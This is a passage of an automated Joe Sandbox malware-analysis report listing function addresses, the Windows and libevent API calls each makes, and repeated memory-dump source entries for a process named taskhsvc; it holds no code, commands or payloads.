      • Part of subcall function 002AC627: event_new.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001C625F), ref: 002AC691
      • Part of subcall function 002AC627: event_add.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001C625F), ref: 002AC6AB
      • Part of subcall function 002AC627: __stack_chk_fail.LIBSSP-0 ref: 002AC722
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 0025B282: __stack_chk_fail.LIBSSP-0 ref: 0025B2C4
    • abort.MSVCRT ref: 001C6309
    • abort.MSVCRT ref: 001C63D7
      • Part of subcall function 001C65EF: __stack_chk_fail.LIBSSP-0 ref: 001C6622
    • __stack_chk_fail.LIBSSP-0 ref: 001C63EC
      • Part of subcall function 003EC2B0: abort.MSVCRT ref: 003EC2FD
      • Part of subcall function 003EC2B0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1AEF), ref: 003EC312
      • Part of subcall function 003EC3EA: abort.MSVCRT ref: 003EC44C
      • Part of subcall function 003EC3EA: abort.MSVCRT ref: 003EC48B
      • Part of subcall function 003EC3EA: abort.MSVCRT ref: 003EC4CA
      • Part of subcall function 003EC3EA: event_new.LIBEVENT-2-0-5 ref: 003EC503
      • Part of subcall function 003EC3EA: free.MSVCRT ref: 003EC52C
      • Part of subcall function 003EC3EA: event_add.LIBEVENT-2-0-5 ref: 003EC560
      • Part of subcall function 003EC3EA: __stack_chk_fail.LIBSSP-0 ref: 003EC573
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00333BFD, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 97
    APIs
    • abort.MSVCRT ref: 00333C50
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • abort.MSVCRT ref: 00333CED
      • Part of subcall function 00333BC0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00333D00), ref: 00333BF6
    • __stack_chk_fail.LIBSSP-0 ref: 00333D71
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 00333D40
      • Part of subcall function 003166E7: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00216C35), ref: 00316717
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001CA737, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 95
    APIs
    • SetProcessDEPPolicy.KERNEL32 ref: 001CA762
      • Part of subcall function 0021FAAB: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CA76C), ref: 0021FB18
      • Part of subcall function 0032B518: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,001CA774), ref: 0032B547
      • Part of subcall function 0032B518: __stack_chk_fail.LIBSSP-0 ref: 0032B59D
    • time.MSVCRT ref: 001CA77B
      • Part of subcall function 0032545C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CA788), ref: 00325486
      • Part of subcall function 003328F6: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001CA78D), ref: 00332917
      • Part of subcall function 00313FB1: strchr.MSVCRT ref: 00313FF5
      • Part of subcall function 00313FB1: __stack_chk_fail.LIBSSP-0 ref: 00314053
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
    • __stack_chk_fail.LIBSSP-0 ref: 001CA93D
      • Part of subcall function 003308B7: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,001CA819), ref: 00330901
    • evutil_secure_rng_set_urandom_device_file.LIBEVENT-2-0-5 ref: 001CA852
      • Part of subcall function 0033051A: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003307D7), ref: 00330566
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0022990B, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92
    APIs
    • SHGetSpecialFolderLocation.SHELL32 ref: 00229964
    • _getcwd.MSVCRT ref: 0022997C
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • SHGetPathFromIDListA.SHELL32 ref: 002299D9
      • Part of subcall function 00315895: strlen.MSVCRT ref: 003158CA
      • Part of subcall function 00315895: __stack_chk_fail.LIBSSP-0 ref: 00315904
      • Part of subcall function 00315911: strlen.MSVCRT ref: 0031596F
      • Part of subcall function 00315911: __stack_chk_fail.LIBSSP-0 ref: 003159B7
    • __stack_chk_fail.LIBSSP-0 ref: 00229AA1
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855077166.00228000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C441C, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 66
    APIs
    • abort.MSVCRT ref: 001C4469
      • Part of subcall function 00287767: abort.MSVCRT ref: 002877D7
      • Part of subcall function 00287767: event_new.LIBEVENT-2-0-5 ref: 00287805
      • Part of subcall function 00287767: abort.MSVCRT ref: 00287850
      • Part of subcall function 00287767: __stack_chk_fail.LIBSSP-0 ref: 00287861
      • Part of subcall function 001C433D: strcmp.MSVCRT ref: 001C4373
      • Part of subcall function 001C433D: __stack_chk_fail.LIBSSP-0 ref: 001C43AE
      • Part of subcall function 003EC2B0: abort.MSVCRT ref: 003EC2FD
      • Part of subcall function 003EC2B0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1AEF), ref: 003EC312
    • event_base_once.LIBEVENT-2-0-5 ref: 001C452C
    • __stack_chk_fail.LIBSSP-0 ref: 001C453D
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0031AD40, Relevance: 12.2, APIs: 8, Instructions: 204
    APIs
    • abort.MSVCRT ref: 0031ADAF
    • abort.MSVCRT ref: 0031ADEE
    • __stack_chk_fail.LIBSSP-0 ref: 0031AFED
      • Part of subcall function 00319A20: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,0031AE1A), ref: 00319A74
    • strchr.MSVCRT ref: 0031AE3D
    • strstr.MSVCRT ref: 0031AE5A
    • strchr.MSVCRT ref: 0031AE76
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 0031AEE4
    • strlen.MSVCRT ref: 0031AF08
      • Part of subcall function 003214A4: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00335D24), ref: 003214FA
      • Part of subcall function 003214A4: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00335D24), ref: 0032153C
      • Part of subcall function 003214A4: strncpy.MSVCRT ref: 00321566
      • Part of subcall function 003214A4: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00335D24), ref: 00321584
      • Part of subcall function 00322124: strchr.MSVCRT ref: 0032215B
      • Part of subcall function 00322124: __stack_chk_fail.LIBSSP-0 ref: 0032219D
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
